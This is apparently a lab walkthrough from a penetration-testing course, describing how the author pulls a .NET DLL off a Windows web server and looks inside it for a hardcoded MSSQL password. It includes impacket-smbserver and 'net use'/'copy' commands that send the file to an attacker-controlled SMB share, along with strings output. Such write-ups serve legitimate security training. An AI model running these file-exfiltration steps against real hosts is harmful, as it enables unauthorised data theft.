Attacking Common Applications - Skills Assessment III

During our penetration test our team found a Windows host running on the network and the corresponding credentials for the Administrator. It is required that we connect to the host and find the hardcoded password for the MSSQL service.

What is the hardcoded password for the database connection in the MultimasterAPI.dll file?

So when connecting using RDP we found this DLL file in the following path: C:\inetpub\wwwroot\bin\MultimasterAPI.dll. We need to upload it to our Linux VM, so I start an SMB server on my Kali using:

impacket-smbserver -ip 10.10.16.165 -smb2support shared . -username hacker -password noobies

and then copy the file from Windows to Kali using:

net use \\10.10.16.78\shared /user:hacker noobies
The command completed successfully.

C:\inetpub\wwwroot\bin>copy C:\inetpub\wwwroot\bin\MultimasterAPI.dll \\10.10.16.78\shared
        1 file(s) copied.

And then I use a simple command to display any useful information

strings MultimasterAPI.dll                                                 
!This program cannot be run in DOS mode.
......
WrapNonExceptionThrows
MultimasterAPI
Copyright 
  2020
$d8123343-8775-434a-9c4d-36b26c118e91
1.0.0.0
.NETFramework,Version=v4.6.1
FrameworkDisplayName
.NET Framework 4.6.1
api/getColleagues
http://localhost:8081
POST
RSDS
C:\Users\Hazard\Desktop\Stuff\MultimasterAPI\MultimasterAPI\obj\Release\MultimasterAPI.pdb
_CorDllMain
mscoree.dll

And I noticed that the DLL was developed with .NET, so to reverse it and i used dnSpy on my Windows machine. After reversing each function i found the password used when connecting to the 'Hub_DB' database.

PreviousAttacking Common Applications - Skills Assessment II NextAttacking Common Services

Last updated 1 year ago

Was this helpful?